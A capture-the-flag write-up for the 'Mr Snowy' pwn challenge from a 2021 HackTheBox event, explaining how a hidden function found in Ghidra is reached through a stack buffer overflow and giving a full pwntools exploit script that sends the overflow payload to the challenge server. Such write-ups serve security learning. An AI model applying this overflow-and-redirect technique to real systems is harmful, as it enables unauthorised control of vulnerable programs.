Mr Snowy

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: pwn

PTS: 300

Description:

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman… it scares me.. He is always 👀 staring at Santa’s house. Something must be wrong with him.



This is the mission: Deactivate that camera.
Opening the file with Ghidra and analyzing the “investigate” function we can clearly see that there is no way of destroying that camera by any conventional methods.
But inside the list of the Functions there’s something particular:


Opening the function:


This is what we were looking for, our way for getting the flag resides in this function but how can we trigger it?
Python is always a good friend in this type of situation.
Using pwn tools we can find the memory address of the deactivate_camera function and with a buffer overflow (caused by an unhandled data input) tell the code to call that specific address.

The size of the buffer can be found with some manual try and error payload

flag_index=p64(e.symbols['deactivate_camera'])
payload = b'A'*offset+flag_index #full payload

Add some interaction with the remote host, put everything together and:

from pwn import *
host='178.128.35.132'
port=32020
p = remote(host,port)

e = ELF('./mr_snowy')#elf file for flag memory address
print(p.recvuntil("it be"))
print(p.recvline())
p.sendline('1')#send data
print(p.recvuntil(">"))
flag_index=p64(e.symbols['deactivate_camera'])
offset = 72
payload = b'A'*offset+flag_index #full payload

p.sendline(payload)#send data
for i in range(0,18):
    print(p.recvline())